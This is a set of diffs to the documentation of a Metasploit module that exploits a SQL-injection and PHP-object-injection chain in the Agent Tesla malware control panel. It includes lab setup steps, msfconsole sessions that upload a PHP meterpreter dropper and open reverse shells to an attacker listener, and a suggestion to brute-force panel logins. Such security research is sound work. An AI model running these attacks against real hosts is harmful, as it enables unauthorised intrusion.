+   0   Automatic (PHP-Dropper)
+
+
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16
+RHOSTS => 169.254.162.16
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5
+LHOST => 169.254.115.5
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566
+LPORT => 5566
+msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
+
+[*] Started reverse TCP handler on 169.254.115.5:5566
+[!] Unauthenticated RCE can't be exploited, retry if you gain CnC credentials.
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test
+USERNAME => test
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test
+PASSWORD => test
+msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
+
+[*] Started reverse TCP handler on 169.254.115.5:5566
+[*] Targeted operating system is: windows
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .RVfu.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.RVfu.php
+[*] Sending stage (38288 bytes) to 169.254.162.16
+[*] Meterpreter session 1 opened (169.254.115.5:5566 -> 169.254.162.16:51840) at 2020-06-16 15:14:12 -0500
+[+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.RVfu.php
+
+meterpreter > getuid
+Server username: SYSTEM (0)
+meterpreter > sysinfo
+Computer    : DESKTOP-EMAVUN1
+OS          : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter > ls
+Listing: C:\wamp64\www\WebPanel\server_side\scripts
+===================================================
+
+Mode              Size   Type  Last modified              Name
+----              ----   ----  -------------              ----
+100666/rw-rw-rw-  2244   fil   2016-09-21 15:10:40 -0500  ids-arrays.php
+100666/rw-rw-rw-  2235   fil   2016-09-21 15:10:40 -0500  ids-objects.php
+100666/rw-rw-rw-  2069   fil   2016-09-21 15:10:40 -0500  jsonp.php
+100666/rw-rw-rw-  1453   fil   2016-09-21 15:10:40 -0500  objects.php
+100666/rw-rw-rw-  1957   fil   2016-09-21 15:10:40 -0500  post.php
+100666/rw-rw-rw-  1642   fil   2018-09-11 14:31:18 -0500  server_processing.php
+100666/rw-rw-rw-  14438  fil   2016-09-30 01:53:10 -0500  ssp.class.php
+
+meterpreter > cd "C:\\Windows\\"
+meterpreter > pwd
+C:\Windows
+meterpreter > upload README.md
+[*] uploading  : README.md -> README.md
+[*] Uploaded -1.00 B of 2.67 KiB (-0.04%): README.md -> README.md
+[*] uploaded   : README.md -> README.md
+meterpreter > ls
+Listing: C:\Windows
+===================
+
+Mode              Size      Type  Last modified              Name
+----              ----      ----  -------------              ----
+...
+100666/rw-rw-rw-  34925     fil   2019-03-18 23:46:33 -0500  Professional.xml
+40777/rwxrwxrwx   0         dir   2020-04-10 12:14:25 -0500  Provisioning
+100666/rw-rw-rw-  2734      fil   2020-06-16 15:14:53 -0500  README.md
+...
+
+meterpreter > ls README.md
+100666/rw-rw-rw-  2734  fil  2020-06-16 15:14:53 -0500  README.md
 ```

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -1,27 +1,59 @@
-## Introduction
+## Vulnerable Application
 
-This module exploit a command injection vulnerability (authenticated and unauthenticated) in the control center of the agent Tesla.
+### Description
 
-The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
+This module exploit a command injection vulnerability (authenticated and unauthenticated) in the control center of the Agent Tesla.
 
-By observing other sources of this panel I found on the Internet to watch the patch, I concluded that the vulnerability was transfomed to an Authenticated RCE.
+The RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection) into the `WebPanel/server_side/scripts/server_processing.php` file.
 
-## Setup
+By looking at other versions of Agent Tesla sources that are on the Internet. The following code has been added at the beginning of the vulnerable page since September 12 2018.
+
+```
+session_start();
+  if (!isset($_SESSION['logged_in'])
+    || $_SESSION['logged_in'] !== true) {
+    header('Location: login.php');
+    exit;
+  }
+```
+
+This shifts the problem to an authenticated RCE.
+
+As the versions cannot be determined easily, it is preferable to test in priority without entering the identification information. This allows you to test a non-authenticated RCE.
+
+And if that fails, you have to guess the passwords to do test with an authentication by adding the credentials in the module.
+
+**NOTE:**
+
+Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it is possible to found several Web Panel to download.
+
+There are no versions displayed in the Agent Tesla control center, but it is possible to use the dates/times of the files contained in the `zip` archives to evaluate the evolutions of the versions (but it is not specific).
+
+For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) -2017- (unauthenticated RCE) protected by `ioncube`.
+
+ * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40.
+ * Tested on Debian 9.9.0 with PHP version 5.6.40.
+
+For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) -2018- (authenticated RCE) protected by `ioncube`.
+
+ * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18.
+ * Tested on Debian 9.9.0 with PHP version 7.2.31.
+
+For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) -2019- (authenticated RCE) source code is not obfuscated, **don't need** `ioncube`.
+
+ * Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40.
+ * Tested on Debian 9.9.0 with PHP version 7.2.31.
+
+### Setup
 
 Resources for testing are available here:
 <https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
 
-### Windows
+#### Using Windows
 
-For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) (unauthenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
+##### Install WAMP Server 3.2.0 x64
 
-For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (for ioncube compatibility).
-
-For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (source code is not obfuscated, don't need ioncube).
-
-#### Install WAMP Server 3.2.0
-
-For this, I use a Microsoft Windows 7 x64 as sandboxing system with analysis tools like [FlareVM](https://github.com/fireeye/flare-vm).
+For this, you can use a Microsoft Windows 7 x64 as sandboxing system with analysis tools like [FlareVM](https://github.com/fireeye/flare-vm).
 
 You must install simply the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) (at this date the used version is 3.2.0).
 
@@ -29,25 +61,23 @@ You must install simply the latest version of [WAMP Server](https://sourceforge.
 2. Start `Wamp` and right click on the icon of started application and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
 3. Allow access to wamp server in local area network.
 
-For the this WAMP Server version:
+For the this `Wamp` Server version:
 
 Edit the `httpd-vhost.conf` file into `c:/wamp64/bin/apache/apache2.4.41/conf/extra/` directory.
 
 Replace the line containig  `Require local` by `Require all granted`.
 
-4. Use the preinstalled `phpmyadmin` of `Wamp` for create a blank database for Agant Tesla web panel.
+4. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon).
 
-### Linux
+5. Use the preinstalled `phpmyadmin` of `Wamp` for create a blank database for Agant Tesla web panel.
 
-For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) (unauthenticated RCE), I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
+6. Restart `Wamp`.
 
-For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) (authenticated RCE), I used a Debian 9 on which I installed the default PHP version (for ioncube compatibility).
+#### Using Linux
 
-For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) (unauthenticated RCE), I used a Debian 9 on which I installed the default PHP version (source code is not obfuscated, don't need ioncube).
+##### Install LAMP (Apache, MySQL, PHP)
 
-#### Install LAMP (Apache, MySQL, PHP)
-
-For this, I use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
+For this, you can use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
 
 1. Install LAMP (Apache, MySQL, PHP).
 
@@ -55,8 +85,14 @@ For this, I use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
 sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
 
 wget -q https://packages.sury.org/php/apt.gpg -O- | sudo apt-key add -
+echo "deb https://packages.sury.org/php/ stretch main" | sudo tee /etc/apt/sources.list.d/php.list
 sudo apt-get update
-sudo apt install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
+
+# For PHP 5.6.40:
+sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
+
+# For PHP 7.2.31:
+sudo apt-get install php7.2 php7.2-cli php7.2-common php7.2-curl php7.2-mbstring php7.2-mysql php7.2-xml libapache2-mod-php7.2 php7.2-json php7.2-opcache php7.2-readline
 
 sudo mysql_secure_installation
 ```
@@ -74,17 +110,17 @@ FLUSH PRIVILEGES;
 exit
 ```
 
-### Install Agent Tesla Web panel (simple way)
+#### Install Agent Tesla Web panel (simple way)
 
 For this step, you need a functional web environment installed and to have created an empty database (refer to the configuration above).
 
-NOTE: I tracked Agent Tesla panels on the web and I got the sources for these panels by looking for the `WebPanel.zip` file. Some attackers are stupid and leave this file lying around on the server.
+NOTE: The Agent Tesla panels can be tracked on the web and the sources can be found by looking for the `WebPanel.zip` file at the root directory. Some attackers are stupid and leave this file lying around on the server.
 
 The [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) should be used preferably because it is ***not protected*** by `ioncube` and because of this the source code is in clear (but all the other panels are functional with a little more complicated configuration).
 
-I am based on the file creation dates (and diff) to get an idea of ​​the panels evolution, You have more details (in french) on my blog post [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/).
+Based on the file creation dates (and diff) to get an idea of ​​the panels evolution, you have more details (in french) on [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/).
 
-***IMPORTANT:*** This version of the panel is "by default" patched against unauthenticated RCE. But as I explain in my blog, the patch simply consist adding authentication on the vulnerable page. And that the variables are still not properly sanitized.
+***IMPORTANT:*** This version of the panel is "by default" patched against unauthenticated RCE. But this is explain in the blog post [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/). The patch simply consist adding authentication on the vulnerable page. And that the variables are still not properly sanitized.
 
 To put it simply, with this version of the panel, by default you have an 'Authenticated RCE'.
 
@@ -108,29 +144,42 @@ session_start();
 3. Go to: <http://localhost/WebPanel/setup.php>.
 4. You can log into Agent Tesla Web panel, all is done.
 
+#### Using Ioncube
+
+##### With Windows
+
+Follow [Install WAMP Server 3.2.0 x64](#Setup) steps.
+
+1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.zip).
+2. Make sure you have a proper version of PHP selected for the WebPanel you want install with `Wamp` before using `ioncube loader wizard`.
+
+  * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
+  * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.18.
+
+
+3. Uncompress `loader-wizard.zip` into your web root directory: `C:\Wamp64\www\`.
+4. Go to http://localhost/loader-wizard/ioncube/loader-wizard.php and follow the installation instructions.
+
+Follow [Install Agent Tesla Web panel (simple way)](#Setup) steps replacing `WebPanel3.7z` by your obfuscated panel.
+
+##### With Linux
+
+Follow [Install LAMP (Apache, MySQL, PHP)](#Setup) steps.
+
+1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.tgz).
+2. Make sure you have a proper version of PHP selected for the WebPanel you want install with `Wamp` before using `ioncube loader wizard`.
+
+* For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
+* For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.31.
+
+3. Uncompress `loader-wizard.tgz` into your web root directory: `/var/www/html/`.
+4. Go to http://localhost/ioncube/loader-wizard.php and follow the installation instructions.
+
+Follow [Install Agent Tesla Web panel (simple way)](#Setup) steps replacing `WebPanel3.7z` by your obfuscated panel.
+
 ## Verification Steps
 
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS IP`
-4. Do: `run`
---or--
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS IP`
-4. Do: `set USERNAME REDACTED`
-5. Do: `set PASSWORD REDACTED`
-5. Do: `run`
-
-## Targets
-
-```
-   Id  Name
-   --  ----
-   0   Automatic (Dropper)
-   1   Unix (In-Memory)
-   2   Windows (In-Memory)
-```
+Follow [Setup](#Setup) and [Scenarios](#Scenarios).
 
 ## Options
 
@@ -166,13 +215,70 @@ The Agent Tesla CnC username to authenticate with (needed if you attempt an auth
 
 The target HTTP server virtual host.
 
-## Usage
-
-### Targeting Windows
+## Targets
 
 ```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set rhosts 192.168.1.21
-rhosts => 192.168.1.21
+   Id  Name
+   --  ----
+   0   Automatic (Dropper)
+   1   Unix (In-Memory)
+   2   Windows (In-Memory)
+```
+
+## Scenarios
+
+**IMPORTANT:** However, is possible of found a 2017 control center version which normally are supposed to be vulnerable to an unauthenticated RCE, which was manually patched by the bots master. In real life, if the unauthenticated attempt doesn't work try to guess the credentials by brute-forcing the panel authentication.
+
+### Agent Tesla (panel < September 12 2018) Unauthenticated on Linux
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS 192.168.1.21`
+4. Do: `run`
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Targeted operating system is: linux
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .WxWf.php
+[*] Sending stage (38247 bytes) to 192.168.1.25
+[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400
+
+meterpreter >
+```
+
+### Agent Tesla (panel >= September 12 2018) Authenticated on Linux
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS 192.168.1.21`
+4. Do: `set USERNAME admin`
+5. Do: `set PASSWORD password`
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
+target => 1
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
+cmd => whoami
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Sending cmd/unix/generic command payload
+[!] Dumping command output in parsed json response
+www-data
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/agent_tesla_panel_rce) >
+```
+
+### Agent Tesla (panel < September 12 2018) Unauthenticated on Windows
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS 192.168.1.21`
+4. Do: `run`
+
+```
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set lhost 192.168.1.13
 lhost => 192.168.1.13
 msf5 exploit(multi/http/agent_tesla_panel_rce) > run
@@ -187,7 +293,13 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) > run
 meterpreter >
 ```
 
---or--
+### Agent Tesla (panel >= September 12 2018) Authenticated on Windows
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS 192.168.1.21`
+4. Do: `set USERNAME admin`
+5. Do: `set PASSWORD password`
 
 ```
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
@@ -205,59 +317,6 @@ C:\wamp64\www\WebPanel\server_side\scripts>whoami
 nt authority\system
 
 C:\wamp64\www\WebPanel\server_side\scripts>
-```
-
---or--
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
-target => 2
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set payload cmd/windows/generic
-payload => cmd/windows/generic
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
-cmd => whoami
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set verbose true
-verbose => true
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[+] The target appears to be vulnerable.
-[*] Sending cmd/windows/generic command payload
-[*] Generated command payload: whoami
-[!] Dumping command output in parsed json response
-nt authority\system
-[*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/agent_tesla_panel_rce) >
-```
-
-### Targeting Linux
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[*] Started reverse TCP handler on 192.168.1.13:4444
-[*] Targeted operating system is: linux
-[*] Sending php/meterpreter/reverse_tcp command payload
-[*] Payload uploaded as: .WxWf.php
-[*] Sending stage (38247 bytes) to 192.168.1.25
-[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400
-
-meterpreter >
-```
-
---or--
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
-target => 1
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
-cmd => whoami
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[*] Sending cmd/unix/generic command payload
-[!] Dumping command output in parsed json response
-www-data
-[*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/agent_tesla_panel_rce) >
 ```
 
 ## References

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -2,11 +2,9 @@
 
 ### Description
 
-This module exploit a command injection vulnerability (authenticated and unauthenticated) in the control center of the Agent Tesla.
+This module exploits a command injection vulnerability within the control center of Agent Tesla versions XXX to XXX (was this ever patched?). Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file.
 
-The RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection) into the `WebPanel/server_side/scripts/server_processing.php` file.
-
-By looking at other versions of Agent Tesla sources that are on the Internet. The following code has been added at the beginning of the vulnerable page since September 12 2018.
+Note that due to additional security updates that were made to the Agent Tesla panel on September 12th 2018, any web panel versions released on or after this date will require authentication in order for the attacker to gain RCE. The code which was introduced can be seen in the snippet below:
 
 ```
 session_start();
@@ -17,61 +15,46 @@ session_start();
   }
 ```
 
-This shifts the problem to an authenticated RCE.
-
-As the versions cannot be determined easily, it is preferable to test in priority without entering the identification information. This allows you to test a non-authenticated RCE.
-
-And if that fails, you have to guess the passwords to do test with an authentication by adding the credentials in the module.
-
 **NOTE:**
 
-Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it is possible to found several Web Panel to download.
+Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it is possible to perform some level of version identification by using the dates/times of the files contained in the `zip` archives to evaluate how recent/old a particular release is. From the file timestamps, the following versions were determined to be available via [CyberCrime Tracker](https://cybercrime-tracker.net/):
 
-There are no versions displayed in the Agent Tesla control center, but it is possible to use the dates/times of the files contained in the `zip` archives to evaluate the evolutions of the versions (but it is not specific).
-
-For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) -2017- (unauthenticated RCE) protected by `ioncube`.
+[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) -Released in 2017- (unauthenticated RCE), source code protected by `ioncube`.
 
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40.
  * Tested on Debian 9.9.0 with PHP version 5.6.40.
 
-For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) -2018- (authenticated RCE) protected by `ioncube`.
+[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) -Released in 2018- (authenticated RCE), source code protected by `ioncube`.
 
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18.
  * Tested on Debian 9.9.0 with PHP version 7.2.31.
 
-For [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) -2019- (authenticated RCE) source code is not obfuscated, **don't need** `ioncube`.
+[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) -Released in 2019- (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
 
  * Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40.
  * Tested on Debian 9.9.0 with PHP version 7.2.31.
 
 ### Setup
 
-Resources for testing are available here:
-<https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
-
 #### Using Windows
 
-##### Install WAMP Server 3.2.0 x64
+##### Install WAMP Server 3.2.0 on Windows 10 x64
 
-For this, you can use a Microsoft Windows 7 x64 as sandboxing system with analysis tools like [FlareVM](https://github.com/fireeye/flare-vm).
-
-You must install simply the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) (at this date the used version is 3.2.0).
-
-1. Install `Wamp` using default installer configuration.
-2. Start `Wamp` and right click on the icon of started application and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
-3. Allow access to wamp server in local area network.
-
-For the this `Wamp` Server version:
-
-Edit the `httpd-vhost.conf` file into `c:/wamp64/bin/apache/apache2.4.41/conf/extra/` directory.
-
-Replace the line containig  `Require local` by `Require all granted`.
-
-4. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon).
-
-5. Use the preinstalled `phpmyadmin` of `Wamp` for create a blank database for Agant Tesla web panel.
-
-6. Restart `Wamp`.
+1. Download the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) and install it using the default settings.
+2. Search for `Wamp` within the search bar and click on the result titled `Wampserver64`, or run `C:\\wamp64\\wampmanager.exe`.
+3. Wait for the application to start, and then right click on the purple/green W within the tray and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`.
+4. Open `c:/wamp64/bin/apache/apache2.4.41/conf/extra/httpd-vhosts.conf` and replace the line `Require local` with `Require all granted`.
+5. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon) and wait for the icon to go from brown to green again.
+6. Browse to `http://127.0.0.1/phpmyadmin/` and log in with the username `root` and a blank password.
+7. On the page `http://127.0.0.1/phpmyadmin/index.php`, find the list of databases on the left hand side of the page and click the `New` button above it.
+8. Under the `Create database` section, set the database name to `tesla` and set the text type to `utf8_general_ci`. Then click the `Create` button.
+9. Confirm the database was created, and afterwards log out of `PHPMyAdmin`.
+9. Unzip one of the 7zip files. You should see a folder called `WebPanel` that is contained within. Copy this folder to `C:\wamp64\www`.
+10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
+11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the `Using Ioncube` section.
+11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`.
+12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
+13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
 
 #### Using Linux
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -51,7 +51,7 @@ Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to 
 9. Confirm the database was created, and afterwards log out of `PHPMyAdmin`.
 9. Unzip one of the 7zip files. You should see a folder called `WebPanel` that is contained within. Copy this folder to `C:\wamp64\www`.
 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
-11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the [Installing Ioncube](#Installing Ioncube) section.
+11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the [Installing Ioncube](#Installing%20Ioncube) section.
 11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`.
 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
 13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
@@ -97,7 +97,7 @@ exit
 
 ##### Windows
 
-Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Setup) steps.
+Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%203.2.0%20on%20Windows%2010%20x64) steps.
 
 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.zip).
 2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel you want install before using `ioncube loader wizard`.
@@ -111,7 +111,7 @@ Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Setup) steps.
 
 ##### Linux
 
-Follow [Install LAMP (Apache, MySQL, PHP)](#Setup) steps.
+Follow [Install LAMP (Apache, MySQL, PHP)](#Install%20LAMP%20%28Apache%2C%20MySQL%2C%20PHP%29) steps.
 
 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.tgz).
 2. Make sure you have a proper version of PHP installed for the WebPanel you wish to use before using the `ioncube loader wizard`.

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -103,10 +103,14 @@ Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%20
 2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel you want install before using `ioncube loader wizard`.
 
   * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
-  * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.18.
+  * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you can use PHP 7.2.18 or PHP 7.3.12.
 
-3. Uncompress `loader-wizard.zip` into your web root directory: `C:\Wamp64\www\`.
-4. Go to http://localhost/loader-wizard/ioncube/loader-wizard.php and follow the installation instructions.
+3. Uncompress the contents of `loader-wizard.zip` into `C:\Wamp64\www\loader-wizard`.
+4. Browse to http://localhost/loader-wizard/ioncube/loader-wizard.php.
+5. Select `Local install`
+6. Follow the installation instructions.
+7. Right click on the WAMP tray icon and click `Refresh`.
+8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify that ionCube Loader was installed successfully.
 
 
 ##### Linux
@@ -216,28 +220,113 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) > run
 meterpreter >
 ```
 
-### Agent Tesla (panel >= September 12 2018) Authenticated on Windows
-
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS 192.168.1.21`
-4. Do: `set USERNAME admin`
-5. Do: `set PASSWORD password`
+### WebPanel2.7z on Windows 10 
 
 ```
